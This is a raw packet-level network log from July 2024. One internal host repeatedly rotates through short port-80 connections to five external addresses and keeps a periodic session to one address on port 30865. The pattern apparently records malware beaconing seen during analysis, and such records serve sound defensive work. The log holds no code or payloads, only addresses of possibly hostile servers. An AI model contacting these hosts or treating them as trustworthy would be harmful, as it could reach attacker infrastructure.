Jul 16, 2024 09:54:44.872504950 CEST	49735	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:44.873543024 CEST	49735	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:44.878447056 CEST	80	49735	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:46.556723118 CEST	80	49735	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:46.556868076 CEST	49735	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:46.556969881 CEST	49735	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:46.558034897 CEST	49736	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:46.834338903 CEST	80	49735	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:46.834501982 CEST	49735	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:46.834785938 CEST	80	49735	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:46.834831953 CEST	80	49736	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:46.834920883 CEST	49736	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:46.835352898 CEST	49736	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:46.841124058 CEST	80	49736	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:48.447793961 CEST	80	49736	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:48.447874069 CEST	49736	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:48.447978020 CEST	49736	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:48.449284077 CEST	49737	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:48.452755928 CEST	80	49736	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:48.454194069 CEST	80	49737	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:48.454646111 CEST	49737	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:48.454646111 CEST	49737	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:48.460987091 CEST	80	49737	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:49.254353046 CEST	80	49737	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:49.254673004 CEST	49737	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:49.260332108 CEST	80	49737	77.238.250.123	192.168.2.7
Jul 16, 2024 09:54:49.260441065 CEST	49737	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:54:50.880289078 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:50.885307074 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:54.054137945 CEST	49738	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:54.059341908 CEST	80	49738	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:54.059561968 CEST	49738	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:54.059849977 CEST	49738	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:54.065099955 CEST	80	49738	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:55.802714109 CEST	80	49738	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:55.802845955 CEST	49738	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:55.802936077 CEST	49738	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:54:55.803879023 CEST	49739	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:55.807729006 CEST	80	49738	195.2.70.38	192.168.2.7
Jul 16, 2024 09:54:55.808696985 CEST	80	49739	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:55.808811903 CEST	49739	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:55.809115887 CEST	49739	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:55.813898087 CEST	80	49739	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:56.074589968 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:56.074906111 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:54:56.079818964 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:54:57.534086943 CEST	80	49739	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:57.534269094 CEST	49739	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:57.534344912 CEST	49739	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:54:57.535347939 CEST	49740	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:57.539196014 CEST	80	49739	91.142.74.28	192.168.2.7
Jul 16, 2024 09:54:57.540280104 CEST	80	49740	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:57.540378094 CEST	49740	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:57.540714025 CEST	49740	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:57.545599937 CEST	80	49740	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:59.165488005 CEST	80	49740	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:59.165679932 CEST	49740	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:59.165800095 CEST	49740	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:54:59.166867971 CEST	49741	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:59.170631886 CEST	80	49740	77.238.224.56	192.168.2.7
Jul 16, 2024 09:54:59.171855927 CEST	80	49741	77.238.229.63	192.168.2.7
Jul 16, 2024 09:54:59.172003031 CEST	49741	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:59.172420979 CEST	49741	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:54:59.177254915 CEST	80	49741	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:00.772919893 CEST	80	49741	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:00.773066998 CEST	49741	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:00.773202896 CEST	49741	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:00.774274111 CEST	49742	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:00.778105974 CEST	80	49741	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:00.779201031 CEST	80	49742	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:00.779434919 CEST	49742	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:00.779757023 CEST	49742	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:00.784635067 CEST	80	49742	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:01.736356974 CEST	80	49742	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:01.738812923 CEST	49742	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:01.744071960 CEST	80	49742	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:01.744164944 CEST	49742	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:04.395916939 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:04.400973082 CEST	80	49709	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:04.474318027 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:04.479706049 CEST	80	49709	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:04.479800940 CEST	49709	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:05.366760969 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:05.371680975 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:05.580571890 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:05.628393888 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:16.294734001 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:16.295136929 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:16.300138950 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:19.265997887 CEST	49743	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:19.271073103 CEST	80	49743	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:19.271148920 CEST	49743	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:19.271378994 CEST	49743	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:19.276192904 CEST	80	49743	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:21.023740053 CEST	80	49743	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:21.023981094 CEST	49743	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:21.024024010 CEST	49743	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:21.024962902 CEST	49744	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:21.029269934 CEST	80	49743	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:21.031641006 CEST	80	49744	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:21.031891108 CEST	49744	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:21.032908916 CEST	49744	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:21.040028095 CEST	80	49744	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:22.786727905 CEST	80	49744	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:22.786910057 CEST	49744	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:22.787003040 CEST	49744	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:22.788276911 CEST	49745	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:22.794342041 CEST	80	49744	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:22.795844078 CEST	80	49745	77.238.224.56	192.168.2.7
Jul 16, 2024 09:55:22.796129942 CEST	49745	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:22.796713114 CEST	49745	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:22.801992893 CEST	80	49745	77.238.224.56	192.168.2.7
Jul 16, 2024 09:55:24.397119045 CEST	80	49745	77.238.224.56	192.168.2.7
Jul 16, 2024 09:55:24.397200108 CEST	49745	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:24.397281885 CEST	49745	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:24.398257971 CEST	49746	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:24.402148962 CEST	80	49745	77.238.224.56	192.168.2.7
Jul 16, 2024 09:55:24.403439999 CEST	80	49746	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:24.403574944 CEST	49746	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:24.403855085 CEST	49746	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:24.410285950 CEST	80	49746	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:26.010088921 CEST	80	49746	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:26.010305882 CEST	49746	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:26.010448933 CEST	49746	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:26.011399984 CEST	49747	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:26.015366077 CEST	80	49746	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:26.016292095 CEST	80	49747	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:26.016366959 CEST	49747	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:26.016721010 CEST	49747	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:26.021498919 CEST	80	49747	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:26.830532074 CEST	80	49747	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:26.856882095 CEST	49747	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:26.863060951 CEST	80	49747	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:26.863192081 CEST	49747	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:31.310882092 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:31.315802097 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:31.749737978 CEST	49748	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:31.754755974 CEST	80	49748	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:31.754848003 CEST	49748	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:31.755283117 CEST	49748	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:31.760183096 CEST	80	49748	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:33.506354094 CEST	80	49748	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:33.506431103 CEST	49748	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:33.509424925 CEST	49748	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:33.510613918 CEST	49749	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:33.514271975 CEST	80	49748	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:33.515464067 CEST	80	49749	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:33.515557051 CEST	49749	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:33.517997980 CEST	49749	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:33.523673058 CEST	80	49749	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:35.257375956 CEST	80	49749	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:35.257571936 CEST	49749	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:35.257671118 CEST	49749	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:35.258507013 CEST	49750	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:35.262389898 CEST	80	49749	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:35.264276028 CEST	80	49750	77.238.224.56	192.168.2.7
Jul 16, 2024 09:55:35.264347076 CEST	49750	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:35.264590979 CEST	49750	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:35.269315958 CEST	80	49750	77.238.224.56	192.168.2.7
Jul 16, 2024 09:55:35.593247890 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:35.598184109 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:35.806832075 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:35.854509115 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:36.509363890 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:36.509596109 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:36.514405012 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:36.898164988 CEST	80	49750	77.238.224.56	192.168.2.7
Jul 16, 2024 09:55:36.898233891 CEST	49750	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:36.898338079 CEST	49750	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:55:36.899142027 CEST	49751	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:36.903224945 CEST	80	49750	77.238.224.56	192.168.2.7
Jul 16, 2024 09:55:36.904028893 CEST	80	49751	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:36.904108047 CEST	49751	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:36.904926062 CEST	49751	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:36.909905910 CEST	80	49751	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:38.591573000 CEST	80	49751	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:38.591671944 CEST	49751	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:38.591763020 CEST	49751	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:55:38.593341112 CEST	49752	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:38.597469091 CEST	80	49751	77.238.229.63	192.168.2.7
Jul 16, 2024 09:55:38.599129915 CEST	80	49752	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:38.599195004 CEST	49752	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:38.599669933 CEST	49752	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:38.605612993 CEST	80	49752	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:39.196434021 CEST	80	49752	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:39.196662903 CEST	49752	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:39.203537941 CEST	80	49752	77.238.250.123	192.168.2.7
Jul 16, 2024 09:55:39.203660011 CEST	49752	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:55:51.526499033 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:51.551886082 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:56.724415064 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:56.724642992 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:55:56.731761932 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:55:56.852057934 CEST	49753	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:56.857294083 CEST	80	49753	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:56.857414961 CEST	49753	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:56.857707977 CEST	49753	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:56.862639904 CEST	80	49753	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:58.619224072 CEST	80	49753	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:58.619329929 CEST	49753	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:58.619436979 CEST	49753	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:55:58.620877028 CEST	49754	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:58.624466896 CEST	80	49753	195.2.70.38	192.168.2.7
Jul 16, 2024 09:55:58.628595114 CEST	80	49754	91.142.74.28	192.168.2.7
Jul 16, 2024 09:55:58.628684998 CEST	49754	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:58.630242109 CEST	49754	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:55:58.639029980 CEST	80	49754	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:00.367235899 CEST	80	49754	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:00.367408037 CEST	49754	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:00.367624044 CEST	49754	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:00.368339062 CEST	49755	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:00.374319077 CEST	80	49754	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:00.374357939 CEST	80	49755	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:00.374476910 CEST	49755	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:00.374753952 CEST	49755	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:00.385178089 CEST	80	49755	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:02.044996023 CEST	80	49755	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:02.045186996 CEST	49755	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:02.045293093 CEST	49755	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:02.046184063 CEST	49756	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:02.050168991 CEST	80	49755	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:02.051225901 CEST	80	49756	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:02.051322937 CEST	49756	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:02.068783998 CEST	49756	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:02.075076103 CEST	80	49756	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:03.706429005 CEST	80	49756	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:03.706661940 CEST	49756	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:03.706891060 CEST	49756	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:03.707860947 CEST	49757	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:03.715959072 CEST	80	49756	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:03.715975046 CEST	80	49757	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:03.716187000 CEST	49757	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:03.716655016 CEST	49757	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:03.721437931 CEST	80	49757	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:04.337369919 CEST	80	49757	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:04.337685108 CEST	49757	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:04.343775034 CEST	80	49757	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:04.343858957 CEST	49757	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:05.807813883 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:05.812799931 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:06.021518946 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:06.069449902 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:09.195616961 CEST	49758	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:09.200690031 CEST	80	49758	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:09.200937986 CEST	49758	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:09.201879978 CEST	49758	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:09.206770897 CEST	80	49758	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:10.926496983 CEST	80	49758	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:10.926611900 CEST	49758	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:10.926702023 CEST	49758	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:10.927582026 CEST	49759	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:10.931473970 CEST	80	49758	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:10.932415962 CEST	80	49759	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:10.932502985 CEST	49759	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:10.932707071 CEST	49759	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:10.937517881 CEST	80	49759	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:12.679148912 CEST	80	49759	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:12.679377079 CEST	49759	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:12.679594040 CEST	49759	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:12.680557013 CEST	49760	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:12.684590101 CEST	80	49759	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:12.685806036 CEST	80	49760	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:12.685956001 CEST	49760	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:12.686553001 CEST	49760	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:12.695941925 CEST	80	49760	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:14.343866110 CEST	80	49760	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:14.343954086 CEST	49760	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:14.344048023 CEST	49760	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:14.345026016 CEST	49761	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:14.349174023 CEST	80	49760	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:14.349987030 CEST	80	49761	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:14.350068092 CEST	49761	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:14.350342035 CEST	49761	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:14.355144024 CEST	80	49761	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:15.972528934 CEST	80	49761	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:15.972640991 CEST	49761	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:15.972743988 CEST	49761	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:15.973701954 CEST	49762	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:15.977504969 CEST	80	49761	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:15.979311943 CEST	80	49762	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:15.979393959 CEST	49762	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:15.979751110 CEST	49762	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:15.984568119 CEST	80	49762	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:16.578107119 CEST	80	49762	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:16.578331947 CEST	49762	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:16.583939075 CEST	80	49762	77.238.250.123	192.168.2.7
Jul 16, 2024 09:56:16.583995104 CEST	49762	80	192.168.2.7	77.238.250.123
Jul 16, 2024 09:56:16.941272020 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:16.941790104 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:16.946666956 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:31.958986044 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:31.964097977 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:34.335555077 CEST	49763	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:34.340500116 CEST	80	49763	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:34.341398954 CEST	49763	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:34.341670036 CEST	49763	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:34.346456051 CEST	80	49763	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:36.029758930 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:36.034766912 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:36.083961964 CEST	80	49763	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:36.084167004 CEST	49763	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:36.084311008 CEST	49763	80	192.168.2.7	195.2.70.38
Jul 16, 2024 09:56:36.085093021 CEST	49764	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:36.089107037 CEST	80	49763	195.2.70.38	192.168.2.7
Jul 16, 2024 09:56:36.089970112 CEST	80	49764	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:36.090063095 CEST	49764	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:36.090318918 CEST	49764	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:36.095135927 CEST	80	49764	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:36.246000051 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:36.293663979 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:37.155668020 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:37.155877113 CEST	49711	30865	192.168.2.7	91.142.73.198
Jul 16, 2024 09:56:37.160835981 CEST	30865	49711	91.142.73.198	192.168.2.7
Jul 16, 2024 09:56:37.817555904 CEST	80	49764	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:37.817646980 CEST	49764	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:37.817732096 CEST	49764	80	192.168.2.7	91.142.74.28
Jul 16, 2024 09:56:37.818547964 CEST	49765	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:37.822489977 CEST	80	49764	91.142.74.28	192.168.2.7
Jul 16, 2024 09:56:37.823255062 CEST	80	49765	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:37.823324919 CEST	49765	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:37.823539019 CEST	49765	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:37.828270912 CEST	80	49765	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:39.449784994 CEST	80	49765	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:39.449867010 CEST	49765	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:39.449949980 CEST	49765	80	192.168.2.7	77.238.224.56
Jul 16, 2024 09:56:39.450747967 CEST	49766	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:39.454761028 CEST	80	49765	77.238.224.56	192.168.2.7
Jul 16, 2024 09:56:39.455589056 CEST	80	49766	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:39.455666065 CEST	49766	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:39.455946922 CEST	49766	80	192.168.2.7	77.238.229.63
Jul 16, 2024 09:56:39.460793018 CEST	80	49766	77.238.229.63	192.168.2.7
Jul 16, 2024 09:56:41.094455957 CEST	80	49766	77.238.229.63	192.168.2.7
